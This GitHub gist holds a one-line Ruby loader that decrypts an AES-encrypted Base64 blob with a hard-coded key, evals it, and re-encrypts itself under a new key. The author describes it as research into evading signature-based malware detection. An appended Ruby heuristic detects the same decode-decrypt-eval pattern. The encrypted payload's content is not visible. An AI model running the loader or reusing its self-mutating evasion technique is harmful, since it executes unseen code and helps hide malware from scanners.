Created
November 23, 2011 22:49
Save codeincontext/1390169 to your computer and use it in GitHub Desktop.
This Ruby script will decrypt itself, execute a payload, and re-encrypt itself with a new key
require 'OpenSSL';require 'Base64';c = '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';c = Base64::decode64 c;s = OpenSSL::Cipher::Cipher.new('aes-256-cbc');s.decrypt;s.pkcs5_keyivgen('a1d53d0b3c1006b2ae67080130f12037');d = s.update(c) + s.final;eval d
Apparently a syntax error?
Works fine in Ruby 1.9.2 in IRB and from a file. Sure you copied it right?
I made this while researching signature-based malware detection. The idea is that this code could potentially evade basic signature-based detection by mutating itself. It doesn't actually do anything harmful, just re-encrypts itself.
The encoded string it generates is a lot larger than it needs to be, because it contains the original, unminified source. If I minified and uglified the source it could be as little as 25% of the size.
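A defender's view of the same script, as an added example that is not part of the gist: the ciphertext and key change on every run, but the loader has to stay in cleartext to decrypt the rest, so a heuristic can match the chain (long high-entropy base64 literal, Base64 decode, OpenSSL decrypt, eval) instead of fixed bytes. The thresholds, function names and the constructed sample generations are assumptions made for illustration.

```ruby
# Added example, not part of the gist. Thresholds and names are assumptions.
MIN_BLOB_LEN = 200  # assumed minimum length of an embedded base64 literal
MIN_ENTROPY  = 4.5  # assumed bits/char; base64 of ciphertext approaches 6.0

# Shannon entropy of a string in bits per character.
def shannon_entropy(str)
  return 0.0 if str.empty?
  counts = Hash.new(0)
  str.each_char { |ch| counts[ch] += 1 }
  counts.values.sum do |n|
    prob = n.to_f / str.length
    -prob * Math.log2(prob)
  end
end

# Names of the loader-chain indicators present in Ruby source text.
def loader_indicators(source)
  found = []
  blobs = source.scan(/['"]([A-Za-z0-9+\/=\s]{#{MIN_BLOB_LEN},})['"]/).flatten
  if blobs.any? { |b| shannon_entropy(b.gsub(/\s/, '')) >= MIN_ENTROPY }
    found << :high_entropy_base64_literal
  end
  found << :base64_decode  if source =~ /Base64(::|\.)(strict_|urlsafe_)?decode64/
  found << :cipher_decrypt if source =~ /OpenSSL::Cipher/ && source =~ /\.decrypt\b/
  found << :eval_call      if source =~ /\b(instance_|class_|module_)?eval\b/
  found
end

# Flag only the full chain: blob -> decode -> decrypt -> eval.
def self_decrypting_loader?(source)
  loader_indicators(source).length == 4
end

# Constructed sample: each "generation" keeps the stub, changes blob and key.
def sample_generation(seed)
  rng  = Random.new(seed)
  blob = [rng.bytes(300)].pack('m0')   # stand-in for the ciphertext
  key  = rng.bytes(16).unpack1('H*')   # stand-in for the rotated key
  "require 'openssl';c = '#{blob}';c = Base64::decode64 c;" \
    "s = OpenSSL::Cipher.new('aes-256-cbc');s.decrypt;" \
    "s.pkcs5_keyivgen('#{key}');d = s.update(c) + s.final;eval d"
end

# Constructed benign script: decodes base64 but never decrypts or evals.
BENIGN = "require 'base64'\nputs Base64.decode64('aGVsbG8=')\n"

puts([1, 2].map { |s| self_decrypting_loader?(sample_generation(s)) }.inspect)
```

Both constructed generations differ byte for byte, yet both are flagged, while the benign script reports only the Base64 decode indicator.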